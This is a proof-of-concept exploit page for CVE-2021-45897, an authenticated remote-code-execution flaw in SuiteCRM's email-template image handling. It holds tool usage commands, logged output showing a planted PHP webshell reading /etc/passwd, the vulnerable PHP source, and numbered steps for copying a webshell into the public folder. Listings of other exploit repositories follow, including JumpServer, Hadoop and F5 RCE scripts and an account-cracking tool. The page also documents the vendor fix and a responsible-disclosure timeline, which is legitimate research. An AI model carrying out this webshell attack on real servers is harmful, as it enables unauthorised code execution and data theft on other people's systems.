PoC for CVE-2021-45897 aka SCRMBT-#180 - RCE via Email-Templates (Authenticated only) in SuiteCRM <= 8.0.1

Overview

CVE-2021-45897

PoC for CVE-2021-45897 aka SCRMBT-#180 - RCE via Email-Templates (Authenticated only) in SuiteCRM <= 8.0.1

This vulnerability was reported to SalesAgility in fixed in SuiteCRM 7.12.3 and SuiteCRM Core 8.0.2. If you are using older versions of SuiteCRM, I highly advise you to update.

Usage

Installation

  1. Make sure to have a recent version of python3 and pip installed.
  2. Clone the repo: git clone https://github.com/manuelz120/CVE-2021-45897.git
  3. Install the required libraries pip3 install -r "requirements.txt"
  4. Enjoy :)

Available options:

(.venv) ➜  CVE-2021-45897 git:(main) ✗ ./exploit.py --help
Usage: exploit.py [OPTIONS]

Options:
  -h, --host TEXT        Root of SuiteCRM installation. Defaults to
                         http://localhost
  -u, --username TEXT    Username
  -p, --password TEXT    password
  -P, --payload TEXT     Shell command to be executed on target system
  -d, --is_core BOOLEAN  SuiteCRM Core (>= 8.0.0). Defaults to False
  --help                 Show this message and exit.

  https://github.com/manuelz120/CVE-2021-45897

Example usage:

(.venv) ➜  CVE-2021-45897 git:(main) ✗ ./exploit.py -u user -p 
   
     --payload "cat /etc/passwd"
INFO:CVE-2021-45897:Login did work - Planting webshell as Note
INFO:CVE-2021-45897:Note with paylaod located @ 6da23afd-06a0-c25a-21bd-61f8364ae722
INFO:CVE-2021-45897:Successfully planted payload at http://localhost/public/6da23afd-06a0-c25a-21bd-61f8364ae722.php
INFO:CVE-2021-45897:Verifying web shell by executing command: 'cat /etc/passwd'
INFO:CVE-2021-45897:------ Starting command output ------
INFO:CVE-2021-45897:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
INFO:CVE-2021-45897:------  Ending command output  ------
INFO:CVE-2021-45897:Enjoy your shell :)

   

Writeup

I recently discovered an interesting RCE attack vector in the PHP based SuiteCRM Software. The vulnerability allows an authenticated attacker with access to the EmailTemplates module to upload malicous PHP files, which can be used to gain remote code execution.

From my point of view, the overall file upload handling in SuiteCRM looks quite secure. Although there is a lot of custom code, developers paid close attention to either remove any file extensions (happening for most file types), or validate the extensions and sanitize the content in case it is an image. There even exists a plugin interface to load third party AV scanners and let them process any uploads.

However, I randomly stumbled upon one interesting little feature hidden in public/legacy/modules/EmailTemplates/EmailTemplate.php:

makePublicImage($match[2], $fileExtension); $newSrc = $sugar_config['site_url'] . '/public/' . $match[2] . '.' . $fileExtension; $this->body_html = to_html(str_replace($match[1], $newSrc, $html)); $this->imageLinkReplaced = true; $this->repairEntryPointImages(); } } private function makePublicImage($id, $ext = 'jpg') { $toFile = 'public/' . $id . '.' . $ext; if (file_exists($toFile)) { return; } $fromFile = 'upload://' . $id; if (!file_exists($fromFile)) { throw new Exception('file not found'); } if (!file_exists('public')) { sugar_mkdir('public', 0777); } $fdata = file_get_contents($fromFile); if (!file_put_contents($toFile, $fdata)) { throw new Exception('file write error'); } }">
private function repairEntryPointImages()
{
    global $sugar_config;

    // repair the images url at entry points, change to a public direct link for remote email clients..


    $html = from_html($this->body_html);
    $siteUrl = $sugar_config['site_url'];
    $regex = '#
   
    ]*[\s]+src=[\s]*["\']('
    . preg_quote($siteUrl) . '\/index\.php\?entryPoint=download&type=Notes&id=([a-f0-9]{8}\-[a-f0-9]{4}\-[a-f0-9]{4}\-[a-f0-9]{4}\-[a-f0-9]{12})&filename=.+?)["\']#si';

    if (preg_match($regex, $html, $match)) {
        $splits = explode('.', $match[1]);
        $fileExtension = end($splits);
        $this->makePublicImage($match[2], $fileExtension);
        $newSrc = $sugar_config['site_url'] . '/public/' . $match[2] . '.' . $fileExtension;
        $this->body_html = to_html(str_replace($match[1], $newSrc, $html));
        $this->imageLinkReplaced = true;
        $this->repairEntryPointImages();
    }
}

private function makePublicImage($id, $ext = 'jpg')
{
    $toFile = 'public/' . $id . '.' . $ext;
    if (file_exists($toFile)) {
        return;
    }
    $fromFile = 'upload://' . $id;
    if (!file_exists($fromFile)) {
        throw new Exception('file not found');
    }
    if (!file_exists('public')) {
        sugar_mkdir('public', 0777);
    }
    $fdata = file_get_contents($fromFile);
    if (!file_put_contents($toFile, $fdata)) {
        throw new Exception('file write error');
    }
}

SuiteCRM allows users to create email templates. The templates can also contain attachments, which are stored in a separate module (the Notes module). Users can attach arbitrary files to email templates. The content of the file is not sanitized in any way. However, it is stored without an extension, so even if it contains potentially malicious PHP code, it wouldn't be executed by the webserver. Authenticated users are also able to download these attachments using a link following the format /index.php?entryPoint=download&type=Notes&id= .

The repairEntryPointImages function is triggered whenever a email template is saved or accessed. If we take a look at the code, we can see that it parses the markup (body_html) of the email template and looks for HTML img tags with a special src attribute. The regular expression basically resembles the format of the internal attachment download link. However, these links only work for users which are authenticated in SuiteCRM, which is most likely not the case for the recipient of the email. Therefore, SuiteCRM automatically creates a copy of the attachment in the public folder of the webserver and replaces the internal download link with the public version. To make sure the Email-Client properly displays the images, it also adds a file extension. However, the extension of the target file in the public folder is directly taken from the filename query parameter of the image src and not validated (note that the filename isn't triggering any other logic and can be freely chosen).

Now we have everything together to craft an exploit that uploads a PHP webshell in the public folder:

  1. Create a new Email-Attachment / Record in the Notes module by uploading a PHP webshell. Remember the id of the Note
  2. SuiteCRM will store the webshell file without extension in the upload folder
  3. Verify that you can download the PHP file by accessing /index.php?entryPoint=download&type=Notes&id=
  4. Create a new email template and add a image tag that matches the regex in repairEntryPointImages, but uses a .php for the filename query parameter (e.g. ).
  5. Save / reload the email template - SuiteCRM will execute the repairEntryPointImages function and copy our webshell with a .php extension to the public folder
  6. Enjoy your shell at http://< >/public/< >.php

Implemented fix

Shortly after my report, new SuiteCRM versions (7.12.3 and 8.0.2) were released, containing the following fix:

patch.png

https://github.com/salesagility/SuiteCRM-Core/commit/5d699396379d7af8697ec985ebc425836202ed43#diff-fb3b09c19812fa070cc86927149c52ef4bffc3057a82249a12f4a82bc0dd576dR922-R926

This ensure that only valid image file extensions are used in repairEntryPointImages and prevents the creation of files with non-whitelisted extensions like .php.

Timeline

  • 21/12/2021: Vulnerability discovered and reported to SuiteCRM
  • 22/12/2021: Vulnerability confirmed by vendor (SalesAgility)
  • 27/01/2022: Release of fixed versions (SuiteCRM 7.12.3 and SuiteCRM Core 8.0.2)
Owner
Manuel Zametter
Passionate Software Engineer & CTF-Fan 🖥️ | Sports Enthusiast ⚽️ | Gamer 🎮 | likes Trash-TV 📺
Manuel Zametter
Industry ready custom API payload with an easy format for building Python APIs (Django/Django Rest Framework)

Industry ready custom API payload with an easy format for building Python APIs (Django/Django Rest Framework) Yosh! If you are a django backend develo

Abram (^o^) 7 Sep 30, 2022
JumpServer远程代码执行漏洞检测利用脚本

Jumpserver-EXP JumpServer远程代码执行漏洞检测利用脚本

Veraxy 181 Dec 20, 2022
Hadoop Yan ResourceManager unauthorized RCE

Vuln Impact There was an unauthorized access vulnerability in Hadoop yarn ResourceManager. This vulnerability existed in Hadoop yarn, the core compone

Al1ex 25 Nov 24, 2022
Hadoop Yan RPC unauthorized RCE

Vuln Impact On November 15, 2021, A security researcher disclosed that there was an unauthorized access vulnerability in Hadoop yarn RPC. This vulnera

Al1ex 25 Nov 24, 2022
Simplify getting and using cookies from the browser to use in Python.

CookieCache Simplify getting and using cookies from the browser to use in Python. NOTE: All the logic to interface with the browsers is done by the Br

pat_h/to/file 2 May 06, 2022
BloodyAD is an Active Directory Privilege Escalation Framework

BloodyAD Framework BloodyAD is an Active Directory Privilege Escalation Framework, it can be used manually using bloodyAD.py or automatically by combi

757 Jan 07, 2023
Um script simples de Port Scan + DNS by Hostname

🖥 PortScan-DNS Esta é uma ferramenta simples de Port Scan + DNS by Hostname... 💻 | DNS Resolver / by Hostname: HOST IP EXTERNO IP INTERNO 💻 | Port

AlbâniaSecurity-RT 7 Dec 08, 2022
CVE-2021-22986 & F5 BIG-IP RCE

Vuln Impact This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management

Al1ex 85 Dec 02, 2022
Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228

log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be

Binary Defense 144 Nov 19, 2022
Python & JavaScript Obfuscator made in Python 3.

Python Code Obfuscator A script that converts code into full on random numerical expressions. Simple Scripts: Python Mode... Input: Function that deco

rzx. 1 Dec 29, 2021
Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes

log4j-nullroute Quick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Ari

Ryan 5 Sep 12, 2022
AttractionFinder - 2022 State Qualified FBLA Attraction Finder Application

Attraction Finder Developers: Riyon Praveen, Aaron Bijoy, & Yash Vora How It Wor

$ky 2 Feb 09, 2022
Reusable Lightweight Pythonic Dependency Injection Library

Vacuna Inject everything! Vacuna is a little library to provide dependency management for your python code. Install pip install vacuna Usage import va

Fernando Martínez González 16 Sep 15, 2021
SEBUAH TOOLS TERMUX CRACK AKUN FF HOMKI AKUN EPEP DAH SATU FOLLOW AE YA BROO AWOKWOK

print " INSTALL TOOLS " $ pkg update && upgrade $ pkg install python2 $ pkg install git $ pip2 install lolcat $ pip2 install bs4 $ pip2 install reques

Jeeck 2 Nov 29, 2021
Mass Check Vulnerable Log4j CVE-2021-44228

Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co

Justakazh 6 Dec 28, 2022
Auerswald COMpact 8.0B Backdoors exploit

CVE-2021-40859 Auerswald COMpact 8.0B Backdoors exploit About Backdoors were discovered in Auerswald COMpact 5500R 7.8A and 8.0B devices, that allow a

6 Sep 22, 2022
Pass2Pwn: a simple python3 tool created to assist penetration testers generate possible passwords for a targeted system based solely on the organization's name

Pass2Pwn is a simple python3 tool created to assist penetration testers generate possible passwords for a targeted system based solely on the organization's name

Nirmal Dahal 10 Oct 15, 2022
Create a secure tunnel from a custom domain to localhost using Fly and WireGuard.

Fly Dev Tunnel Developers commonly use apps like ngrok, localtunnel, or cloudflared to expose a local web service at a publicly-accessible URL. This i

170 Dec 11, 2022
A collection of write-ups and solutions for Cyber FastTrack Spring 2021.

IMPORTANT: Please contact us before you use any styling or content shown here! Cyber FastTrack Spring 2021 / National Cyber Scholarship Competition -

Alice 48 Aug 28, 2022
Valeria stealer- - (4Feb 2022) program detects wifi saved passwords in your ROM

Valeria_stealer- Requirements : python 3.9.2 and higher (4Feb 2022) program dete

Mikhail Yolkin 3 May 05, 2022